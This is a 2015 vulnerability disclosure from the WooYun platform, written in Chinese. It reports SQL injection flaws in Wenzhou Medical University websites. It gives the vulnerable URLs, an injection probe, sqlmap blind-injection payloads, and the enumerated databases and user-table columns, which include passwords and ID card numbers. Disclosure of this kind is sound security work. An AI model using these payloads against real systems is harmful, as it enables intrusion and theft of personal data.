当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0114090

漏洞标题:温州医科大学多处SQL注射漏洞

相关厂商:温州医科大学

漏洞作者: 凌零0

提交时间:2015-05-14 18:15

修复时间:2015-05-19 18:16

公开时间:2015-05-19 18:16

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:8

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-05-14: 细节已通知厂商并且等待厂商处理中
2015-05-19: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

打算找宽字节注入的,http://www.wmu.edu.cn/view.php?id=c18e790c-f910-11e4-a3a3-d70b5c2416ab,随便试试,哈哈。。http://www.wmu.edu.cn/view.php?id=c18e790c-f910-11e4-a3a3-d70b5c2416ab%df' 有货

详细说明:

1.
http://www.wmu.edu.cn/view.php?id=c18e790c-f910-11e4-a3a3-d70b5c2416ab


)EF])AX)S]SVDDB@ZH_FM`5.png


2.
http://rsc.wmu.edu.cn/List.php?BigCategoryId=28
3.
http://rsc.wmu.edu.cn/List.php?BigCategoryId=28&SmallCategoryId=76    BigCategoryId参数
<code>GET parameter 'BigCategoryId' is vulnerable. Do you want to keep testing 
the oth
ers (if any)? [y/N]
sqlmap identified the following injection points with a total of 204 HTTP
(s) req
uests:
---
Parameter: BigCategoryId (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: BigCategoryId=28 AND 2471=2471
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: BigCategoryId=28 AND (SELECT * FROM (SELECT(SLEEP(5)))tznW)
---
[13:04:44] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.2.13
back-end DBMS: MySQL 5.0.12


available databases [3]:
[*] information_schema
[*] rsc_wzmc_edu_cn
[*] test
</code>

漏洞证明:

Database: rsc_wzmc_edu_cn
[8 tables]
+---------------------------------------+
| xsc_bigcategory                       |
| xsc_infolist                          |
| xsc_managers                          |
| xsc_photoinfolist                     |
| xsc_smallcategory                     |
| xsc_special                           |
| xsc_users                             |
| xsc_webinfo                           |
+---------------------------------------+
Database: test
[2 tables]
+---------------------------------------+
| SQL Statement                         |
| xsxx                                  |
+---------------------------------------+
Database: information_schema
[28 tables]
+---------------------------------------+
| CHARACTER_SETS                        |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS                               |
| COLUMN_PRIVILEGES                     |
| ENGINES                               |
| EVENTS                                |
| FILES                                 |
| GLOBAL_STATUS                         |
| GLOBAL_VARIABLES                      |
| KEY_COLUMN_USAGE                      |
| PARTITIONS                            |
| PLUGINS                               |
| PROCESSLIST                           |
| PROFILING                             |
| REFERENTIAL_CONSTRAINTS               |
| ROUTINES                              |
| SCHEMATA                              |
| SCHEMA_PRIVILEGES                     |
| SESSION_STATUS                        |
| SESSION_VARIABLES                     |
| STATISTICS                            |
| TABLES                                |
| TABLE_CONSTRAINTS                     |
| TABLE_PRIVILEGES                      |
| TRIGGERS                              |
| USER_PRIVILEGES                       |
| VIEWS                                 |
+---------------------------------------+


看看xsc_users 表:

[13:33:52] [INFO] retrieved: id
[13:33:57] [INFO] retrieved: bigint(20)
[13:34:20] [INFO] retrieved: username   <---------
[13:34:42] [INFO] retrieved: varchar(50)
[13:35:13] [INFO] retrieved: password   <---------
[13:35:34] [INFO] retrieved: varchar(50)
[13:36:02] [INFO] retrieved: usertype
[13:36:25] [INFO] retrieved: varchar(10)
[13:36:57] [INFO] retrieved: realname
[13:37:16] [INFO] retrieved: varchar(50)
[13:37:43] [INFO] retrieved: nation
[13:37:58] [INFO] retrieved: varchar(10)
[13:38:29] [INFO] retrieved: sex
[13:38:38] [INFO] retrieved: varchar(10)
[13:39:08] [INFO] retrieved: birthyear
[13:39:35] [INFO] retrieved: varchar(50)
[13:40:03] [INFO] retrieved: birthmonth
[13:40:29] [INFO] retrieved: varchar(50)
[13:40:55] [INFO] retrieved: birthday
[13:41:16] [INFO] retrieved: varchar(50)
[13:41:48] [INFO] retrieved: nativeplace
[13:42:24] [INFO] retrieved: varchar(50)
[13:42:50] [INFO] retrieved: cardid
[13:43:12] [INFO] retrieved: varchar(255)
[13:43:45] [INFO] retrieved: telephone
[13:44:09] [INFO] retrieved: varchar(5

还没跑完

修复方案:

过滤,可能还有编码问题,你们更专业~ ~

版权声明:转载请注明来源 凌零0@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-05-19 18:16

厂商回复:

最新状态:

暂无

漏洞评价:

评论